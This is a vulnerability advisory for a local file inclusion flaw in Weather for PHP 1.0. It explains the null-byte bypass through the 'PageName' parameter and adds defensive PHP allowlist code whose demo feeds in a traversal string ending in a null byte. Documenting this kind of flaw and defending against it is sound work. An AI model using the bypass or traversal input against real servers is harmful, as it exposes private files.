Vendor: Weather for PHP
By: BorN To K!LL
CVSS: 5.5 (MEDIUM)
Local File Include
CWE: File Inclusion
Product Name: Weather for PHP
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2007
Weather for PHP <= (PageName) Local File Include Vulnerability
The vulnerability exists in the Weather for PHP script version 1.0. It allows an attacker to include arbitrary local files by manipulating the 'PageName' parameter in the 'index.php' file. By appending '%00' to the 'PageName' parameter, an attacker can bypass the file extension check and include any local file on the server.
Mitigation:
To mitigate this vulnerability, it is recommended to sanitize user input and validate the 'PageName' parameter to prevent any malicious file inclusion.
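One way to apply this mitigation, as an added example (not code from Weather for PHP). It assumes the script builds an include path from `PageName` plus a fixed extension; the function name, page names and directory layout are hypothetical.

```php
<?php
// Added example: allowlist-based resolution of a page parameter.
// ALLOWED_PAGES and the pages directory are hypothetical, not the script's own.
const ALLOWED_PAGES = ['home', 'forecast', 'about'];

function resolve_page($pageName, string $pagesDir): ?string
{
    // Reject arrays (PageName[]=x) and any other non-string input.
    if (!is_string($pageName)) {
        return null;
    }
    // Reject NUL bytes outright so '%00' can never truncate the path.
    if (strpos($pageName, "\0") !== false) {
        return null;
    }
    // Strict allowlist: only known page names are ever mapped to files.
    if (!in_array($pageName, ALLOWED_PAGES, true)) {
        return null;
    }
    // Defence in depth: the resolved file must sit inside the pages directory.
    $base = realpath($pagesDir);
    $path = realpath($pagesDir . '/' . $pageName . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a temporary pages directory with one valid page.
$dir = sys_get_temp_dir() . '/weather_pages_demo';
if (!is_dir($dir)) {
    mkdir($dir, 0700, true);
}
file_put_contents($dir . '/forecast.php', "<?php echo 'forecast';\n");

// Constructed sample inputs, including a NUL-terminated traversal string.
$samples = ['forecast', "../../secret.txt\0", '../config', ['forecast'], 'about'];
foreach ($samples as $s) {
    $resolved = resolve_page($s, $dir);
    printf("%-28s => %s\n", json_encode($s), $resolved ?? 'rejected');
}
// In index.php: $p = resolve_page($_GET['PageName'] ?? 'home', __DIR__ . '/pages');
// then include $p only when it is not null, otherwise answer with a 404.
```

Only `forecast` resolves to a path in the demo; `about` is on the allowlist but has no file in the temporary directory, so it is rejected along with the malformed inputs.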